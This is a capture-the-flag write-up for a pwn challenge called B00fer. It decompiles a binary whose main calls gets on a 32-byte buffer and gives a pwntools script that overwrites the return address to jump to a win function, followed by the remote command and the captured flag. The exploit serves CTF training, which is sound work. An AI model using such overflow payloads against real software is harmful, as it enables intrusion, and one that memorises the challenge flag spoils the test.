B00fer

Intro Link to heading

Name: B00fer
Description:
The Consortium sent us this file and connection info. Looks like they are taunting us.
They are running the file at b00fer.niccgetsspooky.xyz, at port 9001. Try to get them to give up the flag.
nc b00fer.niccgetsspooky.xyz 9001
Author: Robert Blacha

This will be a pwn challenge seeing the name and the fact that we are given a remote.
We are only given the binary, no source code.

Exploring Link to heading

Running checksec we see :

• No stack canary
• No PIE
• The binary is not stripped

Running the program we are asked for an input without much info on what to enter.

Let’s spin up ghidra and see what we’re dealing with.

int main(void)
{
  char buffer [32];
  
  setvbuf(stdout,(char *)0x0,2,0);
  puts("Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n");
  gets(buffer);
  return 0;
}

So we are facing a classic ret2win challenge, we even have a beautiful function named win.

void win(void)
{
  char flag [40];
  FILE *file;
  
  file = fopen("flag.txt","r");
  fread(flag,1,0x20,file);
  puts(flag);
  puts("Good!\n");
  exit(1);
}

Exploiting Link to heading

We simply need to overwrite the return address of main to call win.
First let’s compute the offset, using pwndbg we find that win is at 0x401227 and that the return address of main will be replaced by the 6th byte in the buffer.

To finish this we write a nice script using pwntools

payload = flat(
        b'\x00'*5*8,
        p64(0x401227) 
        )

io = start()

io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)

io.recvline().decode()
print(io.recvline().decode())

And we get the flag :

./exploit.py REMOTE b00fer.niccgetsspooky.xyz 9001
NICC{Sp00ked_the_fl4g_0ut_of_m3}